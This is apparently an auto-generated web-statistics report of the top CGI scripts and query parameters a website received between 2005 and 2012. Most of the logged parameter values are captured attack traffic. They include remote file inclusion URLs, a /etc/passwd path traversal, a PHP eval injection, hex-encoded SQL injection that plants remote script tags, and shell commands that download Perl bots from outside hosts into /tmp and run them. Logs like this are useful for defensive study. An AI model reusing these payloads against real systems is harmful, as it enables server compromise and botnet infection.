6/13/2005 to 2/4/2012: Top 100 CGI Scripts

Top 10 Parameters with Top 10 values

Script	Total Accesses
/	38,389
Parameters by Submitted Value
Parameter	///////administrator/components/com_remository/admin.remosit ory.php?mosConfig_absolute_path
Value	Accesses
http://sites.google.com/site/nurhayatisatu/1.txt???	4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI MG1122.jpg???	2
http://phamsight.com/docs/images/head??	1
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter	/Packages.php?sourcedir
Value	Accesses
http://h1.ripway.com/slavezero/slavesukses.txt??	1
Parameter	/show_image_in_imgtag.php?mosConfig_absolute_path
Value	Accesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio n/id1.txt???	1
Parameter	/zb_path
Value	Accesses
http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??	1
Parameter	/zero_vote/error.php?dir
Value	Accesses
http://jentshin.new21.org/zboard_eng//data/cmd/inc???	1
Parameter
Value	Accesses
	9
Parameter	';DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777302E646F7568756E716 E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2 7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6 96B6520272725223E3C2F7469746C653E3C736372697074207372633D226 87474703A2F2F777777302E646F756	1
Parameter	;DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777302E646F7568756E716 E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2 7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6 96B6520272725223E3C2F7469746C653E3C736372697074207372633D226 87474703A2F2F777777302E646F7568	1
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
OTHER:	38,364
Script	Total Accesses
//	25,684
Parameters by Submitted Value
	1
Parameter	*
Value	Accesses
zZz_ADOConnection{}eval($_GET[w]);class zZz_ADOConnection{}/ /	1
Parameter	APB_rp
Value	Accesses
http://109.cypanel.com/bbs/icon/icon.gif???	20
http://www.sanri.org/img/10.jpg???	3
http://www.haruuu.com/albanianid.txt?????	3
http://www.beautifulchurch.org/images/main/style.css??	2
http://www.jugendheim-lenting.de/karten//components/com_gall eria/kontol.txt?	2
http://www.imsrn.fr/images/stories/rocher/thumbnails/robots. txt??	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.hagenclauss.de//vwar/convert/.r/bush??	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
test??	15
http://www.pmachinery.com/uploads/3e83eab0fd962680.jpg??	14
http://www.cyos.co.kr/gallery/readme.txt??	10
http://webmail.netropol.hu//horde/util/dump.txt??	8
http://latino.yartown.ru/skins/sqlid.txt??	7
http://www.vwgolf-club.ru/forum//includes/gif/newid.txt?	2
http://www.mandlakaziestates.co.za/contact.txt???	2
http://incesp.com/id1.txt?	2
http://oursoultvxq.com/bbs/data/bbs/chi.txt??	1
http://cluster76.bannaipol.org/includes/chi.txt??	1
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.hotelmoulin.com/db/icon/aa.txt?	5
http://www.johngarzon.com.co/list/heheh.txt????	5
Parameter	DIR_PATH
Value	Accesses
http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt???	1
Parameter	DIR_PREFIX
Value	Accesses
http://loutreandco.free.fr/Pages/Sondages/db/id1.txt? ?	2
http://www.the-real.com/steelbahamas/id1.txt??	2
http://www.uk.rug.nl/php/blog-uraad/data/idv6.txt???	2
http://c.frey.free.fr/r/module/INI/id.txt? ??	1
http://c.frey.free.fr/r/editor/id1.txt?? ?	1
http://www.r-sauna.ru//assets/cache/id1.txt? ?	1
http://betterchoice.secureserver101.com//assets/export/id1.t xt ?	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.seeum.co.kr/zero/zipcode/crespon1.txt?	6
http://comhelp.spb.ru//idxx.txt???	6
http://www.mandlakaziestates.co.za/contact.txt???	5
http://sebastianundsarah.de/photos/f/thumbs/test.txt??	4
http://www.luzaclub.ru/McN/idfx.txt??	3
http://www.foodntop.com/bbs/data/notice_1/robot.txt????	3
http://www.kq-china.com/web//plugins/system/id1.txt???	3
http://www.seeum.co.kr/zero/data/idxx.txt??	2
http://www.waawaa.com//Partner/order/readme.txt???	2
http://www.lazar.ru/manager/processors/readme.txt??	2
Parameter	GALLERY_BASEDIR../../../../../../../../../../../../../../../ etc/passwd
Value	Accesses
	2
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	8
http://www.syahrulazlan.com/login/id.txt???	2
http://www.mandlakaziestates.co.za/contact.txt???	2
http://www.hubns.co.kr//data/list/heheh.txt???	1
http://weko.co.kr/data/file/notice/test.txt?? ??	1
OTHER:	25,515
Script	Total Accesses
/wusage/	11,777
Parameters by Submitted Value
Parameter	///////administrator/components/com_remository/admin.remosit ory.php?mosConfig_absolute_path
Value	Accesses
http://sites.google.com/site/nurhayatisatu/1.txt???	4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI MG1122.jpg???	3
http://phamsight.com/docs/images/head??	1
Parameter	//kboard/kboard.php?board
Value	Accesses
notice	2
Parameter	/show_image_in_imgtag.php?mosConfig_absolute_path
Value	Accesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio n/id1.txt???	1
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
Parameter	APB_rp
Value	Accesses
http://www.bellasbar.co.za//templates_c/5.gif??	13
http://www.camoplast.com/pdf/1.gif?	5
http://www.baab.it/roxa/id1.txt???	4
http://www.lan51.fr/Portail/tp-images/a.gif??	2
http://www.kerfootgroup.co.uk/kf_pics/id1.txt????	2
http://www.artvariety.co.za/scan/zfxid1.txt??	2
http://www.skillpickle.com//data/.id/open.txt?	1
http://roxd.altervista.org/id1.txt???	1
http://www.porto.napoli.it/tt/Ckrid1.txt??	1
http://mgquadro.fileave.com/fz1.txt??	1
Parameter	CFG[libdir]
Value	Accesses
http://aboutav.com//o/id1.txt???	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co py/id1.txt??	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.phoxlab.com.br//xmlrpc/fx29id.txt????	6
http://163.16.46.253/appserv/www/fx29id1.txt??	4
http://hist.hongik.ac.kr/zb4pl6/data/teszos?	1
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???	2
http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt??	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt?	7
http://www.enyzone.cz/components/com_poll/z1??	7
http://geschenkpuzzle.de/logs/session/idxx.txt??	4
http://setennis.com/zb41pl8/bbs/id1.txt?	4
http://www.mama-nsk.ru/fx29id.txt?	3
http://www.steannareptile.it//administrator/id1.txt??	3
http://pdcmanagement.com///idfx1.gif???	3
http://saskatchewan.localjobshop.ca/media/id1??	3
http://users4.nofeehost.com/anjrit/fx/id1.txt??	3
http://www.fraternidadsinaloense.com/foro/uiu.txt??	2
OTHER:	11,677
Script	Total Accesses
/wusage/summary/	11,202
Parameters by Submitted Value
Parameter	/show_image_in_imgtag.php?mosConfig_absolute_path
Value	Accesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio n/id1.txt???	1
Parameter
Value	Accesses
	4
Parameter	';DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2 E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707 43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652 0272725223E3C2F7469746C653E3C736372697074207372633D226874747 03A2F2F73646F2E	16
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777332E73733131716E2E6 36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2 D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206 C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F	1
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7 5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6 520272725223E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F6A732E	1
Parameter	;DECLARE @S CHAR(4000);SET @S
Value	Accesses
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2 E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707 43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652 0272725223E3C2F7469746C653E3C736372697074207372633D226874747 03A2F2F73646F2E3	15
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777332E73733131716E2E6 36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2 D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206 C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F7	1
CAST(0x4445434C415245204054207661726368617228323535292C40432 076617263686172283430303029204445434C415245205461626C655F437 572736F7220435552534F5220464F522073656C65637420612E6E616D652 C622E6E616D652066726F6D207379736F626A6563747320612C737973636 F6C756D6E73206220776865726520612E69643D622E696420616E6420612 E78747970653D27752720616E642028622E78747970653D3939206F72206 22E78747970653D3335206F7220622E78747970653D323331206F7220622 E78747970653D31363729204F50454E205461626C655F437572736F72204 645544348204E4558542046524F4D20205461626C655F437572736F72204 94E544F2040542C4043205748494C4528404046455443485F53544154555 33D302920424547494E20657865632827757064617465205B272B40542B2 75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2 F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7 5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6 520272725223E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F6A732E7	1
Parameter
Value	Accesses
http://www.wingraphics.com/calendar/id?	1
Parameter	??/help.php?css_path
Value	Accesses
http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt?	1
Parameter	??????mosConfig_absolute_path
Value	Accesses
http://www.larisco.com/id.txt??	2
Parameter	APB_rp
Value	Accesses
http://mgquadro.fileave.com/fz1.txt??	1
http://www.skillpickle.com//data/.id/open.txt?	1
http://www.porto.napoli.it/tt/Ckrid1.txt??	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co py/id1.txt??	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.phoxlab.com.br//xmlrpc/fx29id.txt????	6
http://plengeh.wen.ru/id.txt????	4
http://www.readingastro.org.uk/graphics/moon/id.txt??	4
http://suwung.890m.com/test.txt???	2
http://www.klammehand.be/forum/language/lang_polish/idmic2.t xt?	2
http://ebooks.siteburg.com/chid.txt??	2
http://www.readingastro.org.uk//wap/in/id.txt??	2
http://www.amembersignup.com/signup/id.txt? ??	2
http://www.skd.it/vwar/admin/can?	1
http://hist.hongik.ac.kr/zb4pl6/data/teszos?	1
OTHER:	11,128
Script	Total Accesses
/wusage//	9,679
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://109.cypanel.com/bbs/icon/icon.gif???	1
http://www.haruuu.com/albanianid.txt?????	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	4
http://incesp.com/id1.txt?	2
http://kb27.co.kr/bbs///id1.txt??	1
http://withkor.net/snapshot/id1.txt??	1
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.johngarzon.com.co/list/heheh.txt????	5
http://www.hotelmoulin.com/db/icon/aa.txt?	3
Parameter	DIR_PREFIX
Value	Accesses
http://www.the-real.com/steelbahamas/id1.txt??	2
Parameter	DOCUMENT_ROOT
Value	Accesses
http://comhelp.spb.ru//idxx.txt???	6
http://www.seeum.co.kr/zero/zipcode/crespon1.txt?	6
http://www.kq-china.com/web//plugins/system/id1.txt???	3
http://www.foodntop.com/bbs/data/notice_1/robot.txt????	3
http://www.lazar.ru/manager/processors/min.txt?	2
http://www.allforweb.co.kr/data/lang/fatal1.txt??	2
http://www.seeum.co.kr/zero/data/idxx.txt??	2
http://mobilemagic.sanook.com/cache/fx29id1.txt?	1
http://www.hyonsvc.co.kr//bbs/upload/id1.txt???	1
http://www.solmae.co.kr///receipt/lib/_private/id1.txt?	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	2
http://www.hubns.co.kr//data/list/heheh.txt???	1
Parameter	GLOBALS
Value	Accesses
	177
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt?	9
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt?	6
http://www.luvyadating.com/temp/cache/userimages/id/id1.txt? ?	4
http://www.fileden.com/files/2009/11/5/2637636/id1.txt??	4
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve r1?	3
http://nic.bupt.edu.cn/media/j1.txt??	3
http://www.cyos.co.kr/gallery/readme.txt??	2
http://listwm.info//fx29id.txt?	2
http://www.infocleaners.com/images/title/idosyris.gif????	2
http://www.babywaves.com//a/pid??	2
Parameter	Inc[temp_root]
Value	Accesses
http://creative-alchemy.com/zencart//media/id1.txt???	1
Parameter	Itemid
Value	Accesses
12	56
	4
OTHER:	9,354
Script	Total Accesses
/wusage/summary/cgi.html//skin/zero_vote/error.php	9,551
Parameters by Submitted Value
Parameter	/mosConfig_absolute_path
Value	Accesses
http://tukangbecak.com/ban.gif?	1
Parameter
Value	Accesses
	2
Parameter	action
Value	Accesses
	1
Parameter	cmd
Value	Accesses
uname -a; id	35
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	32
id	28
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	24
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	21
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	21
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	18
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	12
Parameter	dir
Value	Accesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	98
http://www.jungo8949.co.kr/tool25.txt?	97
http://usuarios.arnet.com.ar/larry123/safe.txt?	96
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	85
	74
http://www.gumgangfarm.com/shop/data/id.txt?	59
http://216.83.134.89/teste2bot.txt?	52
http://www.freewebs.com/yahwek/phpbot.txt?	49
http://wsteam.net/bt/var.txt?	48
http://www.capsoir.com/images/TRA.txt?	46
Parameter	dirhttp://206.71.148.89/pbot.txt??]
Value	Accesses
	1
Parameter	dirhttp://brutus.altervista.org/php5/insert??
Value	Accesses
	1
Parameter	dirhttp://www.aabbcc.kit.net/vai.txt?
Value	Accesses
	1
Parameter	dirhttp://www.ss3s.org/r57.txt?
Value	Accesses
	1
Parameter	error
Value	Accesses
http://www.codeduc.cl/documentos/id.txt??	2
OTHER:	8,618
Script	Total Accesses
/wusage/summary//	8,070
Parameters by Submitted Value
Parameter	APB_rp
Value	Accesses
http://109.cypanel.com/bbs/icon/icon.gif???	20
http://www.haruuu.com/albanianid.txt?????	2
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://www.hagenclauss.de//vwar/convert/.r/bush??	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	4
http://incesp.com/id1.txt?	2
http://trimedia-online.net/ihmank/id.txt???	1
http://withkor.net/snapshot/id1.txt??	1
http://kb27.co.kr/bbs///id1.txt??	1
Parameter	CONFIG_EXT[LIB_DIR]
Value	Accesses
http://www.johngarzon.com.co/list/heheh.txt????	9
http://www.hotelmoulin.com/db/icon/aa.txt?	5
Parameter	DOCUMENT_ROOT
Value	Accesses
http://vacancesgrandbornand.com/id1.php?	2
http://sample3.itprogram.co.kr//upload/product/id1.txt????	1
http://mobilemagic.sanook.com/cache/fx29id1.txt?	1
http://www.fan-bo.org/siicva/modules/Uploads/Uploads/id1.txt ???	1
http://www.solmae.co.kr///receipt/lib/_private/id1.txt?	1
Parameter	GALLERY_BASEDIR
Value	Accesses
http://www.cyos.co.kr/gallery/readme.txt??	2
http://www.hubns.co.kr//data/list/heheh.txt???	1
Parameter	GLOBALS
Value	Accesses
	41
Parameter	INCLUDE_FOLDER
Value	Accesses
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt?	4
http://nic.bupt.edu.cn/media/j1.txt??	4
http://www.infocleaners.com/images/title/idosyris.gif????	2
http://www.cyos.co.kr/gallery/readme.txt??	2
http://zonadeclientes.com/id1.txt??	2
http://www.roldanfsf.com/www/mambots/system/idc.jpg??	2
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve r1?	1
http://plengeh.co.cc/scripts/id1.txt???	1
http://tstk.org//ktmllite/images/upload/sh1.txt????	1
/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt??	1
Parameter	Itemid
Value	Accesses
	1
12	60
	9
Parameter	REX[INCLUDE_PATH]
Value	Accesses
http://pediatric-neurology-paris.net/media/install_41aca995b 9171/patch/includes/vsc/botid.txt?	4
http://www.foodntop.com/bbs/icon/LC1??	2
http://80.24.176.145/time//appserv/file.txt???	2
http://www.all3c.com///images/mono/20100907/app/functions/re sponse.txt?	2
OTHER:	7,874
Script	Total Accesses
/wusage/summary/cgi.html/components/com_galleria/galleria.ht ml.php	7,398
Parameters by Submitted Value
Parameter
Value	Accesses
http://hackangel.xm.com/good.txt?	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	29
uname -a; id	25
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt ;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/ /nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet .txt;rm botnet.txt	24
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	22
cd /tmp;rm ng.txt;wget http://www.cer3ja.xpg.com.br/ng.txt;f etch http://www.cer3ja.xpg.com.br/ng.txt;lwp-download http:/ /www.cer3ja.xpg.com.br/ng.txt;curl -O http://www.cer3ja.xpg. com.br/ng.txt;lynx http://www.cer3ja.xpg.com.br/ng.txt;perl ng.txt;rm -rf ng.txt	16
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	15
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	15
id	15
cd /tmp;rm -rf pacote;wget http://br.geocities.com/ozaminha /pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx t;lynx -source http://br.geocities.com/ozaminha/pacote.txt > pacote.txt;perl pacote.txt;rm -rf pacote.txt	12
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt; fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http ://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson .110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt; perl bn.txt	12
Parameter	list
Value	Accesses
1	31
Parameter	mosConfig_absolute_
Value	Accesses
http://www.lordxpl.xpg.com.br/own.txt????	8
http://www.lordxpl.we.bs/own.txt????	6
http://joaobenner.googlepages.com/script2.txt??	4
	2
http://www.lordxpl.xpg.com.br/own.txt??	1
http://www.lordxpl.xpg.com.br/xxxx.txt??	1
Parameter	mosConfig_absolute_path
Value	Accesses
	2
http://ch3z.max-host.pl/z/z/k.txt?	283
http://ownsirc.googlepages.com/botnet.txt?	98
http://www.jungo8949.co.kr/tool25.txt?	95
	93
http://www.oslutadores.com/?id=23530	70
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	67
http://www.freewebs.com/yahwek/sete.txt?	64
http://www.?	62
http://www.freewebs.com/yahwek/phpbot.txt?	60
Parameter	mosConfig_absolute_pathhttp://kamloopstutor.com/images/Qe3?
Value	Accesses
	1
Parameter	mosConfig_absolute_pathhttp://www.geocities.com/t0penghit4m/ DXKYTGF-09887/topeng.txt?
Value	Accesses
	1
Parameter	mosconfig_absolute_path
Value	Accesses
	30
http://agatsuma.bestfreewebspace.net/bn	2
Parameter	output
Value	Accesses
notfounderror/components/com_galleria/galleria.html.php?mosC onfig_absolute_path=http://www.vampireunix.net/cmds.txt?	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	6,229
Script	Total Accesses
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery. html.php	6,768
Parameters by Submitted Value
Parameter
Value	Accesses
	2
http://badmus.by.ru/id.txt?	1
Parameter	cmd
Value	Accesses
uname -a; id	28
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b ot.txt;rm bot.txt	24
id	24
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	18
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	15
cd /tmp;wget http://www.freewebs.com/ferinha/ferinha.txt;cur l -O -f http://www.freewebs.com/ferinha/ferinha.txt;lynx -so urce http://www.freewebs.com/ferinha/ferinha.txt;lwp-rget ht tp://www.freewebs.com/ferinha/ferinha.txt;fetch http://www.f reewebs.com/ferinha/ferinha.txt;perl ferinha.txt;rm -rf feri nha.txt	14
